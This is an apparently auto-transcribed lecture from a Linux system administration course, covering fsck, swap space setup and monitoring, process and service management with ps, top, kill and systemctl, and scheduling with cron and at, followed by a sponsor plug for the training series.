fsck, the file system check, is what actually runs from the /etc/fstab file when we set the pass option while declaring what should run at boot: as we looked at the various partitions and disks launched at boot, the very last field was whether to pass or not, and saying yes means fsck checks that file system at startup. It stands for file system consistency check, and it detects and repairs file system issues; you should pretty much use it. Beyond the automatic check at boot, run it whenever the computer wasn't shut down properly, crashed, or lost power, to make sure nothing was lost and the file system is still consistent when you reboot. If you manually reboot or shut down without properly unmounting a file system, that's another reason to run fsck on it. If there's a boot failure, where you start the computer and for whatever reason a file system doesn't come up, you run fsck to diagnose what happened and why it didn't boot or mount. The same goes for mount failures: if a partition won't mount, fsck helps you find and resolve the underlying issue. And understand the nuance here: a device can be physically connected to the computer yet not be mounted. Those are different things, so if it's connected but not mounted, you need to find out why it isn't mounting.
so if it’s not mounted you need to find out why it’s not mounting then we have periodic maintenance so just preventative checks right so to just make sure that uh it’s all good and uh there’s nothing wrong with it you just run routine maintenance um if there’s any kind of an update or a health issue or any kind of a minor issue you can catch that before a major issue comes into play and before there’s a crash or before you lose any data and then there’s schedule check so many systems are actually configured to run this automatically at boot like we already talked about after a certain number of reboots or Mount operations um you can write scripts to do it for you every week or something or every month just to make sure your amount uh points and your file systems are all good so uh it’s better to do it regularly instead of waiting for some kind of a crash to happen or some kind of error to come up so that if there is something going on you can catch it in advance and then you can fix it so running it at boot is as simple as making sure that the pass option has been turned on with your FS tab configuration file uh manual invocation would be to just run pseudo FS check on whatever that partition is or whatever that dis is and it’s as simple as just running pseudo FS check it’s really this part is not is not that complicated to explain um you can also have unmounted partitions that you want to check uh before um running to avoid any kind of potential data corruption so you can unmount the partition first and then run FS check on it to just make sure everything is all good and that’s another strategy that you can run to run FS check um there’s interactive mode that can actually prompt you to fix anything um within the interactive mode and you can use the flags to automate the process um so for example Dy will be automatically answering yes to all of the prompts that come up so do you want to automatically repair something you just do Dy and then it’ll go ahead and uh run the entire autocorrect for you or the automatic repair for you uh without you constantly having to say yes yes yes so it can be opened in Interactive mode for the repair of any file system if it needs to be file repaired or any partition that needs to be repaired and then if you just attach that- y it’ll do everything automatically so as a summary you have any proper shutdown or file system error or any periodic maintenance that may be required that to run FS check on it and it just makes sure that the file system remains consistent uh if there’s any data loss you can be preventing it or catch it in advance if there is mainten maintenance that needs needs to be done um making sure that the system just runs smoothly all the time without uh risking the loss of any data it’s very very important um as an extra reminder just make sure that you back up the important Data before running FS check because sometimes through the uh through the repair process you may actually lose certain data because if there’s something with that file system that has been uh corrupted or if there’s malicious data or some kind of a malware or something that’s been installed on it uh you most likely are going to uh in the process of wiping that malware you’re going to lose other data that may be important to you so you want to make sure that you run backups uh or save the important files before you run FS check just in case it wipes certain things as an attempt to repair your file system which brings us to the configuration and management of the swap space 
so um we’ve kind have gone over this so we’ll just re-review this cuz this actually was a little bit of a concept for me to wrap my head around as well so it’s virtual memory so the swap is virtual memory on your hard drive that’s used when physical processing power is maxed out right so your RAM is technically part of the processing power of your computer so you’ll you know you’ll hear people like computer nerds you’ll hear computer nerds be like oh I got a 64 gab RAM on my computer there was literally somebody that actually commented on the channel that they were like yeah I remember my first computer had 24 megabytes of RAM and then now I have a 64 gigb of ram I’m like holy crap dude 24 megabytes like you know the system is old when you’re measuring the Ram with megabytes instead of gigabytes so you’ll have these nerds that really really compete over the size of their ram my Ram is bigger than yours kind of a thing and it’s mainly because it helps run things much much faster and usually in modern computers if they have 64 GB of RAM or 128 GB of RAM if they have that much RAM you’re most likely not going to worry about swap space but if it’s limited so if you have 4 GB of RAM or if you have 8 GB of RAM or something like that the swap space is very important because it’s going to serve as virtual memory to save uh life processes so that you don’t lose anything especially when you put the system into hibernation or it goes into sleep or something and you want to turn it back on and pick up where you left off all of that data is either inside of the ram the random access memory or it’s inside of the swap space so the swap is a buffer to prevent out of memory errors meaning that the system can’t run because the physical memory has been maxed out and so it’ll take whatever is being uh it’s kind of over the threshold of the physical RAM it’ll hold on to that um by offloading the inactive processes from the ram so if you have too many things open and you’re actively using something the ram processing power is going to be dedicated to what you’re actually using and everything else that’s in the background is going to go into your swap space if you want to create a swap partition you can create that swap partition using the Fisk command so you can create a partition uh simply by just opening up whatever it is that you’re trying to open up and then you would create a swipe uh swap type of a partition so uh a dis partitioning tool which is f disk you’re going to uh use it uh on the specific location so in this particular case it’s sdb as you can notice so it’s sdb which is going to be our external or secondary dis and it’s going to be where the swap partition is going to be created you can replace it with whatever identifier that you want to use and then you actually go through the process as you interact with Fisk to create the partition right so you would open up f disk on that location press n to create a new Partition press P to create a primary partition and the partition number for example would be two and then you accept all the default uh first sectors to accept the default last sector and then you have to change the partition type so this is the part right here where you change the partition type to swap you press t for swap I don’t know why it’s t maybe it’s temporary that’s what stands for maybe and then you press 82 which is the Linux swap number and then that’s it and you press enter and then after all of that is done you press W and press enter to write all of the changes to the disk 
Then exit fdisk, and all the work you did is saved. (I'll spare you the repetition here; I sometimes forget I'm recording and beat a dead horse because I want to make sure you get it, but you can always rewind and replay. Moving on.)

Now you format that partition as swap space: you take the partition you just made with fdisk and turn it into swap using the mkswap (make swap) command. Then you turn it on: you've used fdisk to create the partition, mkswap to format it as a swap partition, and finally swapon to actually activate it as the swap partition. Very simple. To verify the swap space, use the --show option with swapon, which lists the active swap spaces so you can make sure it was created, is turned on, and is running smoothly.

Creating a swap file is similar to having a swap partition. You create the file with fallocate using the -l option (that's a lowercase L, don't confuse it with the digit one): sudo fallocate -l 1G followed by the swap file path allocates one gigabyte to that file, so you have a swap file instead of a swap partition; -l 1G is the size limit and the path is wherever the swap file lives. Then chmod 600 on the swap file changes its mode so that read and write permissions belong to the owner only, which is what swap needs. Then you turn it into swap, exactly the same as with the partition: you run mkswap on the swap file path, and then swapon on that path to turn it on. Once it's been turned on, make sure it's active and running with sudo swapon --show, which shows whether that specific swap file has been activated.
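Both activation paths as a sketch, assuming the partition /dev/sdb2 and a swap file at /swapfile:

```bash
# Swap partition: format, enable
sudo mkswap /dev/sdb2
sudo swapon /dev/sdb2

# Swap file: allocate, lock down, format, enable
sudo fallocate -l 1G /swapfile   # -l is a lowercase L, not the digit one
sudo chmod 600 /swapfile         # read/write for the owner only
sudo mkswap /swapfile
sudo swapon /swapfile

# Verify either one
sudo swapon --show
```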
The last step with your swap partition or swap file is making sure it loads every time you boot the computer, which means adding it to the /etc/fstab file, as we've discussed so far. We can do it with our trusty nano text editor, opening /etc/fstab with sudo, of course, so you can actually write to it and save it. Then you add the swap entry according to the formatting we've talked about: the device path (or swap file path), the mount point (none, since swap isn't mounted anywhere), the type (swap), the options (sw), whether to dump it (0, no), and whether fsck should check it at boot (also 0). Swap doesn't need dumping or checking because it gets wiped every single time the computer reboots anyway; that's the whole purpose of swap, it isn't going to store any persistent data. Notice that the partition entry and the swap file entry look almost exactly the same: you're giving the path to the partition in one and the path to the swap file in the other, and that's basically it. Once you've written everything into the fstab file inside nano, save the changes with Ctrl+O and Enter, then Ctrl+X to exit, and you can move on.
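A sketch of what those two lines might look like in /etc/fstab, reusing the example paths from above:

```bash
# <device/file>  <mount point>  <type>  <options>  <dump>  <pass>
/dev/sdb2        none           swap    sw         0       0
/swapfile        none           swap    sw         0       0
```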
In summary, creating and configuring swap space, whether as a partition or a file, is essential for maintaining system performance. It's probably a good idea to have it regardless of how much RAM is installed: macOS and Windows machines still keep swap space whether they have 16 GB, 32 GB, or more, so if you're going to be a Linux administrator using the kind of interface that has no GUI and doesn't come preconfigured, make sure swap space has been configured, and if it hasn't, configure it the way we just talked about (and of course we'll review all of this in the practical section). Your little cheat sheet: create a swap partition with fdisk, format it as swap with mkswap, and turn it on with swapon; or, for a file, fallocate -l 1G the swap file, sudo chmod 600 it, mkswap it, and swapon it.

Once you've created swap space, you have to manage it: monitoring swap usage and ensuring the configuration persists across reboots and restarts is very important for system administration. To check swap usage, run swapon -s, which displays a summary of the swap space usage, listing all the active swap areas. In our example output there's a /swapfile entry and the /dev/sdb2 swap partition, with their sizes; the swap file has 2048 kB used at priority -2, while the partition sits at priority -1 and hasn't been used at all (it's 1 GB worth of space, and nothing has needed it yet). The fields are the path to the swap file or partition, the type (file or partition), the total size, the amount used, and the priority of that swap space. One correction worth making here: in Linux, a higher priority number means that swap area is used first, so -1 outranks -2.

Another way to check usage is the free command: free -h provides a human-readable format of memory and swap usage. The output has a Mem row and a Swap row, whatever your allocation is from the swap partitions or files you've created, with columns for the total amount, the used amount, the free amount, shared, buff/cache, and available. Shared is memory used by tmpfs, the shared temporary file system; buff/cache is the buffering and caching we talked about, the memory used by kernel buffers and the page cache. That buffered and cached data is exactly what we meant when we talked about unmounting: you want to properly unmount or shut down so those gigabytes get written out rather than lost, because on a 15 GB system, losing 5 GB of in-flight data would be catastrophic. And after the used, shared, and buff/cache amounts are all accounted for, the available column shows what's actually left for new work on that system.
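The monitoring commands in one place; swapon -a is explained just below:

```bash
swapon -s         # summary of active swap areas: path, type, size, used, priority
free -h           # human-readable memory and swap usage
sudo swapon -a    # activate every swap entry listed in /etc/fstab
swapon --show     # confirm what's active and correctly configured
```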
For the permanent swap configuration, to make sure swap is available after the system reboots, you have to add it to /etc/fstab, the file that contains the information about these partitions, as we've covered. You edit it with sudo nano /etc/fstab and make sure the swap partition entry is in place; adding the swap file entry is the exact same concept with the exact same breakdown, so I won't repeat it, just understand that both actions get their permanence from that same fstab configuration file. Then save and exit: since you're inside nano, make sure you save, and even if you try to exit without saving it will prompt you, so press Y and Enter and all of your changes are saved to the document. Activating is exactly the same as before: sudo swapon -a activates all the swap entries inside fstab, or you can run sudo swapon with the path or identity of a specific swap space, and then swapon --show shows you the status of everything and whether it's active and correctly configured.

In summary, we monitor and configure swap space to make sure the system can handle memory-intensive work and remains stable under heavy load, which matters in high-traffic, multi-user environments; even with a massive amount of physical RAM, you want a good amount of swap when a lot of data is being processed by a lot of different users. And here's your little cheat sheet: swapon -s lists all the active swap areas; free -h gives a human-readable summary of memory and swap usage; permanent edits go in the fstab configuration so they load every single time; and swapon -a activates all the swap entries inside the fstab file.

All right, real quick, let's go into process and service management. You've got to understand the difference between processes, daemons, and services. A process is an instance of a program that's running in memory. Each process has its own process ID (PID) and a parent process ID (PPID).
Processes can be in various states, three main ones: running, sleeping, and zombie. So: an instance of a program running in memory, with a PID and a PPID, in a running, sleeping, or zombie state.

Daemons are background processes running without an interactive user; they're basically what runs behind the scenes in order for your machine to operate the way it does. They start at boot and continue to run while the computer is on so that all of the operating system's functions can work. For example, a web server daemon like httpd (the d stands for daemon), and likewise anything ending in d: sshd, the secure shell daemon, or crond, the cron daemon. These are the background processes attached to each of those individual SSH or HTTP processes, and so on.

A service is the higher-level concept: services group one or more daemons together to provide a specific functionality. The httpd service runs the Apache HTTP server daemon, for instance; that's the thing to understand, a service is a combination of at least one or more daemons providing a specific functionality. They're typically managed with systemd or SysVinit, the initialization systems we talked about earlier. It's probably going to be systemd on all modern Linux machines; SysVinit is a bit of a legacy system, and it depends on the distribution and version of Linux you have. So: you have processes, you have daemons, and then you have services.

These are the commands that manage processes. To view the list of processes, just type ps and press Enter; by itself it shows a snapshot of your current processes. ps aux shows all the processes running on the system with details like the PIDs, the user running each one, and the CPU and memory usage each is taking up. ps -ef displays all the processes with additional details like the parent process ID and the full command line. These are the things that get used heavily in security analysis, incident response, and the pen-testing exercises we run. The command line that launched a process can come from the system, from the parent process running it, or from a user: when a user clicks on something, a command actually runs in the background, so even if you double-click to open something, there's a command-line entry launching that process. Everything, whether or not you used the command line yourself, has a full command-line entry associated with it.
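The three forms side by side; ps aux is the BSD-style syntax and ps -ef the System V style, and both are standard:

```bash
ps        # snapshot of your current processes
ps aux    # all processes, with user, CPU, and memory usage
ps -ef    # all processes, with PPID and the full command line
```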
To a lot of people that command-line column reads as jargon, but in many instances it's the individual command plus the path of the binary attached to the process that's launching and actually running. Remember, all of these things have system binaries associated with them, and each of those binaries is housed inside the bin or sbin directories in our file system. Keep all of that in mind. You don't necessarily need to know much more about this yet; know the details presented here, and as we go through the practical portions of this training series we'll run the common ps options and look at the various processes in greater detail, so you can see what it all looks like on the terminal and really get it into your system (your personal system, as the person watching this, not your computer system). Moving on.

Real-time process monitoring happens with top and htop. top is typically available on all Linux systems, and also on macOS, since macOS runs a Unix-like operating system in the background. It's a dynamic display of everything that's going on: type top, press Enter, and it shows everything currently running, with the line items reordering in real time as something comes to the forefront or uses more CPU or memory. You get a good idea of which specific process is using how much of your resources in real time, and this is one of the things you'd look at to spot something running that you don't recognize and may need to kill. So apart from the static list of processes we saw with ps, top shows a real-time, usage-ordered view, and inside it you can press q to quit, k to kill a process, and r to renice, which means to adjust the priority of a process. htop, if it's installed, is essentially top with a user-friendly interface: top is literally lines of entries on a black screen, which can be overwhelming if you don't know what you're looking at, while htop is the visually pleasing version, with the same real-time monitoring plus color-coded information and a better navigation interface, so you can prioritize what you're looking at more easily.
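A usage sketch; the install line assumes a Debian/Ubuntu-style system with apt, so adjust for your package manager:

```bash
top                     # live, self-updating process view
                        #   q = quit, k = kill a PID, r = renice a process
sudo apt install htop   # htop usually isn't preinstalled (apt assumed here)
htop                    # the color-coded, friendlier equivalent
```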
Once you've identified a process that needs to be killed, for example something that looks shady or is taking up too much CPU or memory, you can kill it with kill or pkill. kill is a very simple command: you give it the PID, and it sends a termination signal to that process ID. kill -9 PID sends the KILL signal to forcefully terminate a process that's taking too long to terminate or is slowing things down; it's very similar to the Windows Task Manager, where something won't close so you open Task Manager and force-quit it, and no matter what's going on, the process dies. pkill lets you kill by name: kill requires the process ID, pkill can kill by the process name. You can also terminate all instances of a specified process with killall, which requires sudo: sudo killall followed by the process name. For example, say you have ten Chrome windows open; that's what my computer is like all the time, with a Chrome window for each Google account dedicated to a different part of my life, and sometimes I want to close Chrome altogether and start from scratch. On macOS I can just right-click the Chrome icon at the bottom of my screen and quit, closing every instance. But inside the command line, where you don't get the option of right-clicking, you'd see ten instances of that process and, whether you want to free up CPU or you don't recognize it and it seems like spamware, you run sudo killall with the process name, it kills all those instances, and it frees up whatever memory and CPU they were using.
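A sketch with a placeholder PID (1234) and example process names; substitute what you actually see in top or ps:

```bash
kill 1234              # polite termination request (SIGTERM) to PID 1234
kill -9 1234           # forceful SIGKILL when it refuses to exit
pkill firefox          # kill by process name instead of PID
sudo killall chrome    # terminate every instance of the named process
```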
And as we manage processes, we also need to learn how to manage services. Managing services happens with systemctl, which we actually went through a little earlier. systemctl is one of the big things that comes with systemd, the more modern version of the init process for Linux, and it's the primary command for managing services in that environment. Starting or stopping a service is sudo systemctl start (or stop) followed by the service name, very simple. Enabling or disabling is much the same, sudo systemctl enable or disable the service, which controls whether it starts automatically at boot. Checking on it is systemctl status, which shows whether it's active along with any logs from recent activity, and restarting or reloading is, likewise, restart or reload. It's very intuitive; I love the syntax for this particular command, because if you want to start something you literally type start and if you want to stop it you type stop. It's real language, real words, which makes it an easy one to remember and deal with. So keep this straight and internalize it as you move forward: ps manages processes, systemctl manages services.

The service command is used on systems that have SysVinit, the older init compared to systemd: systemd is in the modern distributions of Linux, SysVinit in the older versions and distributions. It's fairly similar to what you went through with systemctl, except the syntax is a little different: sudo service, then the name of the service, then start, stop, status, or restart. In the practical portion of our exercises we won't be using the SysVinit commands; we're installing the most up-to-date version of Linux, because I don't want known security vulnerabilities loaded on my computer as we go through the exercises, so we'll end up using systemctl. The SysVinit commands are listed here and also in the Google notes document I've created for this course, and if all else fails you can go to something like Gemini or ChatGPT, say you're running a system with SysVinit as the service manager, describe what you need to do, and it'll tell you the commands to run. The main things to remember: SysVinit is for older versions and distributions, and systemd comes with the modern ones.
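Both styles side by side, with nginx as a stand-in service name:

```bash
# systemd (modern distributions)
sudo systemctl start nginx      # start it now
sudo systemctl stop nginx       # stop it
sudo systemctl enable nginx     # start automatically at boot
sudo systemctl disable nginx    # don't start at boot
systemctl status nginx          # active state plus recent log lines
sudo systemctl restart nginx    # stop, then start
sudo systemctl reload nginx     # re-read config without a full restart

# SysVinit (older distributions)
sudo service nginx start
sudo service nginx status
sudo service nginx restart
```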
Then we have job scheduling. Cron jobs are for repeated tasks that you need on a schedule, while the at command is for a singular, one-time run. Anything recurring goes through cron, which essentially handles all the recurring scheduled tasks for you. Cron jobs are defined in crontab files, and you edit your own user's crontab with crontab -e. When you open someone's crontab you'll see entries in a five-field format, a row of asterisks representing the minute, hour, day of the month, month, and day of the week, followed by the command to run. In our particular example the job runs at 5:00 a.m. every Monday: it doesn't run every minute, so the minute field is set; the hour field is 5, the fifth hour of the day; the day-of-month and month fields are left as asterisks, meaning any day and any month; and the day-of-week field is 1, which in cron is Monday, not Sunday. (The hour field runs 0 to 23, so 5 means 5 a.m.; the day of the month runs 1 to 31, since months without that day simply never match; and the months run 1 to 12, January through December.) So this job is being run weekly, Mondays at 5 a.m. There are also a lot of great crontab editors available online: tell one the path of the job you want to run and the time, day, or month you want, and it'll generate this format of the command for you, though honestly this isn't complicated, so you should be able to wrap your head around it. To modify those cron jobs you use crontab -e for whatever user you're logged in as, and if you just want to look at the scheduled tasks instead of opening the editor, crontab -l lists all the cron jobs for your user.
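The Monday 5 a.m. example as an actual crontab line; /path/to/script.sh is a stand-in for whatever you're scheduling:

```bash
crontab -e    # opens your crontab; add a line like the one below

# minute  hour  day-of-month  month  day-of-week  command
  0       5     *             *      1            /path/to/script.sh
# runs at 5:00 a.m. every Monday

crontab -l    # list your scheduled jobs
```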
it’s going to Echo this piece right here and that’s what at does so it will uh it’ll run something one time for you if you needed to run daily or more than once you would do it with Chron jobs if you’re just trying to run it once you can run it with the at command you can look at the scheduled jobs for at with atq and you can remove them with ATR r m and then the job number itself so you would do atq and it will bring you all of the jobs that have been scheduled with at and then you will get the job number with each job that’s been scheduled and if you need to remove anyone you just do atrm at remove and then do the job number and then just like that you can remove the scheduled task with at this training series is sponsored by hackaholic Anonymous to get the supporting materials for this series like the 900 page slideshow the 200 Page page notes document and all of the pre-made shell scripts consider joining the agent tier of hackolo anonymous you’ll also get monthly python automations exclusive content and direct access to me via Discord join hack alic Anonymous today
